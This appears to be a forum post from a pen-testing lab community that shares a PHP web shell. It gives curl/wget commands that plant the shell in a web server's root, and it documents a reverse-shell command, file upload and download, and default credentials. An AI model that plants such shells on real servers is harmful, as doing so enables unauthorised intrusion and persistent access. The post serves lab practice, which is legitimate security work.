Sooo, I am getting a bit exhausted with people’s reverse shells crashing boxes (also shuffling through them to find one that works). Here is a nice web shell that gives you a terminal like page to execute basic commands from. It’s not a TRUE reverse shell but it is good enough for most of the things you will do here at least. Enjoy,
php-shell
A simple, intuitive, feature rich, php web shell for pen testing.
Usage
To download use one of the following (or similar)
curl https://github.com/eb3095/php-shell/raw/master/php-shell.php > /var/www/html/php-shell.php
wget https://github.com/eb3095/php-shell/raw/master/php-shell.php -O /var/www/html
From there just visit the website with /php-shell.php at the end and enjoy your web based shell from the host!
Controls
- Arrow Up: History up
- Arrow Down: History down
- Enter: Run command
- Click Anywhere: Focus command prompt
History is not saved across sessions and is stored locally in the browser for the time being.
Commands
- exit: Log out
- cd: Change directory
- cls: Clear the screen
- rshell: “rshell IP PORT” open a remote shell to the specified address
- upload: Shows a file prompt then uploads the file to the current directory
- download: Download a file either relative path or full. “download FILE”
cd is unique here. If you do the following,
cd /home; ls
This will be executed as a SH/BASH command. The cd will not set the current working directory outside of the exec. However,
cd /home
This will be executed as an internal command setting the PHP cwd and it is permanent (until refresh).
Credentials
The defaults are,
- Username: user
- Password: pass
The username and password are both hashed via sha512 and set in the file directly.